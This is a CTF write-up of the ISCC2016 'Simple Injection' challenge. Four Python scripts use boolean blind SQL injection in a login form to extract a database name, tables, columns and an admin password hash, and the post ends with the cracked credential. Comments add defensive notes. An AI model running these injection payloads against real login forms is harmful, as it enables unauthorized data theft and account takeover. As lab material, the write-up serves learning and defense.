  • sql盲注脚本(ISCC2016)Simple Injection

    爆数据库

    # Step 1 of the ISCC2016 "Simple Injection" writeup: recover the current
    # database name one character at a time with a boolean-based blind
    # injection in the login form's username field.
    # The script relies on login.php returning a body of a different length
    # depending on whether the injected condition holds. From the defender's
    # side: parameterized queries remove the injection itself, and a uniform
    # error body removes the length oracle. Each character position costs
    # exactly len(s) == 94 POSTs to the same URL (there is no early exit), which
    # is the burst pattern a login-rate monitor or WAF would observe.
    import string
    import requests
    
    url = 'http://web.jarvisoj.com:32787/login.php'
    s = string.digits + string.ascii_letters + string.punctuation # candidate alphabet: digits, upper/lower-case letters and punctuation (94 chars)
    payload = {
        'username' : '',
        'password' : 1
    }
    result = ''  # characters recovered so far, in positional order
    
    # Injected username: {0} is the 1-based position handed to substr(),
    # {1} the ASCII code of the candidate being tested.
    username_template = "'or/**/ascii(substr(database(),{0},1))={1}#"
    
    st = 0
    for i in range(1,50):  # i is the 1-based character position; the loop caps the result at 49 characters
        st = 0  # becomes 1 once some candidate matched at this position
        for c in s :
            asc = ord(c)   # ASCII code of the candidate, compared server-side by the injected ascii(...) = {1}
            payload['username'] = username_template.format(i,asc)
            response = requests.post(url, data=payload)
            if len(response.text) < 1192 :   # length oracle: a shorter body is read as "condition true"; the 1192 threshold was found by printing len(response.text)
                result += c
                print('database: ', result)
                st = 1
        # NOTE(review): no break after a hit, so every candidate is sent for each
        # position and a noisy oracle can append more than one character per position.
        if st == 0:
            break  # no candidate matched: the string is exhausted
    print('database: ', result)
    
    

    database=injection

    爆表名

    # Step 2: same length-oracle loop as the database-name script, but the
    # injected subquery now reads the table names of the current database
    # from information_schema.tables (joined by group_concat, so the result
    # is one comma-separated string extracted left to right).
    # Defender's view: the query shape (information_schema, substr, ascii)
    # in a login POST body is a high-confidence detection signal on its own.
    import string
    import requests
    
    url = 'http://web.jarvisoj.com:32787/login.php'
    s = string.digits + string.ascii_letters + string.punctuation  # 94 candidate characters
    payload = {
        'username' : '',
        'password' : 1
    }
    result = ''  # table-name string recovered so far
    
    # {0}: 1-based position for substr(); {1}: ASCII code under test.
    username_template = "'or/**/ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#"
    
    st = 0
    for i in range(1,50):  # character position, capped at 49
        st = 0  # set to 1 when a candidate matches at this position
        for c in s :
            asc = ord(c)
            payload['username'] = username_template.format(i,asc)
            response = requests.post(url, data=payload)
            if len(response.text) < 1192 :  # length oracle; threshold taken from the first script
                result += c
                print('tables: ', result)
                st = 1
        if st == 0:
            break  # nothing matched: end of string
    print('tables: ', result)
    

    tables: admin

    爆列名

    # Step 3: identical loop, now extracting the column names of the table
    # found in step 2 (hard-coded as 'admin') from information_schema.columns,
    # again as one comma-joined string.
    # Defender's view: the 94-requests-per-character burst and the
    # information_schema reference in the username field are both detectable.
    import string
    import requests
    
    url = 'http://web.jarvisoj.com:32787/login.php'
    s = string.digits + string.ascii_letters + string.punctuation  # 94 candidate characters
    payload = {
        'username' : '',
        'password' : 1
    }
    result = ''  # column-name string recovered so far
    
    # {0}: 1-based position for substr(); {1}: ASCII code under test.
    username_template = "'or/**/ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='admin'),{0},1))={1}#"
    
    st = 0
    for i in range(1,50):  # character position, capped at 49
        st = 0  # set to 1 when a candidate matches at this position
        for c in s :
            asc = ord(c)
            payload['username'] = username_template.format(i,asc)
            response = requests.post(url, data=payload)
            if len(response.text) < 1192 :  # length oracle; threshold taken from the first script
                result += c
                print('columns: ', result)
                st = 1
        if st == 0:
            break  # nothing matched: end of string
    print('columns: ', result)
    

    columns: id,username,password

    爆值

    # Step 4: identical loop, extracting the password column of the admin
    # table discovered in steps 2-3. The writeup below shows the recovered
    # value is an unsalted MD5 digest; storing credentials with a slow,
    # salted password hash is the mitigation that makes this final step
    # useless even when the injection exists.
    import string
    import requests
    
    url = 'http://web.jarvisoj.com:32787/login.php'
    s = string.digits + string.ascii_letters + string.punctuation  # 94 candidate characters
    payload = {
        'username' : '',
        'password' : 1
    }
    result = ''  # password string recovered so far
    
    # {0}: 1-based position for substr(); {1}: ASCII code under test.
    username_template = "'or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))={1}#"
    
    st = 0
    for i in range(1,50):  # character position, capped at 49
        st = 0  # set to 1 when a candidate matches at this position
        for c in s :
            asc = ord(c)
            payload['username'] = username_template.format(i,asc)
            response = requests.post(url, data=payload)
            if len(response.text) < 1192 :  # length oracle; threshold taken from the first script
                result += c
                print('password: ', result)
                st = 1
        if st == 0:
            break  # nothing matched: end of string
    print('password: ', result)
    

    password: 334cfb59c9d74849801d5acdcfdaadc3

    MD5解密后得到的提交

    username=admin&password=eTAloCrEP

  • 原文地址:https://www.cnblogs.com/NPFS/p/12837454.html